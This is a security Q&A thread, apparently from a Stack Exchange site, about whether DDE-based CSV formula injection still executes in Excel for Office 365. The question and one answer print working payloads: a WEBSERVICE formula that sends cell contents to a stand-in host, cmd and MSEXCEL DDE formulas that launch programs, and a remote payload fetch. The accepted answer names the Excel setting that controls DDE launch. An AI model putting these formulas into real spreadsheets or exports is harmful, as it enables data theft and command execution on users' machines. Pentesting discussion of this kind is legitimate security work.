# Does "=cmd" CSV injection still exist in 2020?

Tags: windows, injection, office, excel

I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as:

```
=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50))
```

I am now trying to create a "more dangerous" payload and I see a lot of reference online using something such as:

```
=cmd|' /C calc'!A0
```

However, I can't find a way to have such a payload trigger, I always get a `#REF!` error. Is this kind of attack still feasible in 2020 ? Or did Microsoft implement a mitigation for those attacks?

I'm running Excel for Office 365 version 1902.

Answer (score 8, accepted):

Finally found the reason why the payload were not executing: DDE launch was disabled in Excel options.

If someone has the same issue, this setting can be found in

```
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch
```

Reference https://docs.microsoft.com/en-us/office365/troubleshoot/security/security-settings

Answer (score 0):

I haven't tested this, but it might be possible to get this to run using the `WEBSERVICE` function.  According to [microsoft](https://www.microsoft.com/en-us/microsoft-365/blog/2013/03/21/use-webservice-functions-to-automatically-update-excel-2013-spreadsheets-with-online-data/) you can update cells with the function, then combining with this [mimecast](https://www.mimecast.com/blog/2019/06/exploit-using-microsoft-excel-power-query-for-remote-dde-execution-discovered/) article it appears you could load your malicious "cell-code" using this function.

It would look something like this:

`=WEBSERVICE("http://example.com/payload.txt")`

Where `payload.txt` contains:

`=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''`

Payload courtesy of [PentestLab Blog](https://pentestlab.blog/2018/01/16/microsoft-office-dde-attacks/), so not sure if it still executes the same way.

Comment: Hi Blaise, thanks for your answer,
I understand the concerpt of loading the payload using WEBSERVICE function, my issue is more about creating the payload.
If I paste the code from PentestLab in my Excel, I only get a #REF! error and no code execution :(